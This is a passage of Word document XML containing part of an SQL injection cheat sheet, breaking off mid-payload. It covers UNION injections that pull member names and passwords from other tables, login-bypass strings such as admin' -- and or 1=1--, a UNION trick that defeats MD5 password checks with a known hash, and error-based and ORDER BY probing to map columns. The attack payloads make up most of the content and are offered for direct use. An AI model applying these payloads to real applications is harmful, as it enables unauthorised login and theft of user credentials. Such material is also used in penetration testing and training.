          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="UnionInjections"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:t>Union Injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C17E1E"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With union you do SQL queries cross-table. Basically you can poison query to return records from another table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05103C1D"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header, txt FROM news UNION ALL SELECT name, pass FROM members </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>This will combine results from both news table and members table and return all of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADED7A3"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Another Example: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 UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32035D69"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bookmarkStart w:id="21" w:name="UnionLanguageIssues"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>UNION – Fixing Language Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46234CC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While exploiting Union injections sometimes you get errors because of different language settings (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>table settings, field settings, combined table / db settings etc.</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>) these functions are quite useful to fix this problem. It's rare but if you dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Japanese, Russian, Turkish</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> etc. applications then you will see it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53453AA5" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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SQL Server (S) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>field</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>COLLATE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> SQL_Latin1_General_Cp1254_CS_AS</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> or some other valid one - </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>check out SQL Server documentation</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header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E7A94E" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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MySQL (M)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Hex() </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>for every possible issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F56D540"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bookmarkStart w:id="22" w:name="ByPassingLoginScreens"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Bypassing Login Screens (SMO+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513FCFC4"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i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SQL Injection 101</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, Login tricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1812720A" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ADA953" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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admin' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4597C4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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admin'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC0009" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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or 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA3E32" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0830F7B5" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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or 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B91AD" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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or '1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40307928" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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or ('1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA4CF2C" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AC8415" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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Login as different user (SM*)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 UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C53DCD6"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i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>*Old versions of MySQL doesn't support union queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384BFB53"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Bypassing second MD5 hash check login screens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F5631C"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If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E81FB5"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23" w:name="BypassingMD5Hash"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Bypassing MD5 Hash Check Example (MSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01154A3C"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Username :</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Password : </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CD8D5B"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81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B4A051"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C773AF9"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Error Based - Find Columns Names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E4822"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Finding Column Names with </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>HAVING BY</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> - Error Based (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C22CD9"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i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In the same order,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153F5B46" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> HAVING 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D491F" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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GROUP BY </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>table.columnfromerror1</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> HAVING 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0B090C" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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GROUP BY </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>table.columnfromerror1, columnfromerror2</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> HAVING 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566E295" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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GROUP BY </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>table.columnfromerror1, columnfromerror2, columnfromerror(n) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>HAVING 1=1 --</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>and so on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770F4412" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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If you are not getting any more error then it's done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB34D7E"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Finding how many columns in SELECT query by </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(MSO+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB0A46E"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Finding column number by ORDER BY can speed up the UNION SQL Injection process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA0D8A4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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ORDER BY 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A3ECC3" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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ORDER BY 2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BEBEDF" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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ORDER BY N--</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>so on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD362C" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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Keep going until get an error. Error means you found the number of selected columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B04028F"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Data types, UNION, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E31A37"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Hints,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7189E4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Always use </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> with </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ALL </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>because of </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> similar non-distinct field types. By default union tries to get records with distinct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3EED4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>if injection is in WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>). This can be critical if you are only getting one result at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE36B9" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61762CD9" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>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Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>because normally developers are not expecting to see NULL in a username field</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA37247"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Finding Column Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5263C16B" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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union select sum(</w:t>
      </w:r>
